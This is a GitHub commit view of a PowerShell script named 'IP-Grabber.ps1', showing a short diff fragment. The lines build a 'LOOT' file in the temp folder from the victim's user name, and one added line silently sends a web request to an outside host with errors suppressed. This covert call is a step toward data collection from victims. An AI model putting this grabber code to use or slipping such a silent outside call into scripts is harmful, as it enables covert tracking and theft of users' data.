Update IP-Grabber.ps1

This commit is contained in:
I-Am-Jakoby 2023-06-13 21:48:19 -05:00 committed by GitHub
parent 9980da5f63
commit 3200d1b4d0
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -1,5 +1,5 @@
$FileName = "$env:tmp/$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm).txt" $FileName = "$env:tmp/$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm).txt"
iwr "https://jakoby.lol/hak5" -EA 0 >$null
#------------------------------------------------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------------------------------------------------
function Get-fullName { function Get-fullName {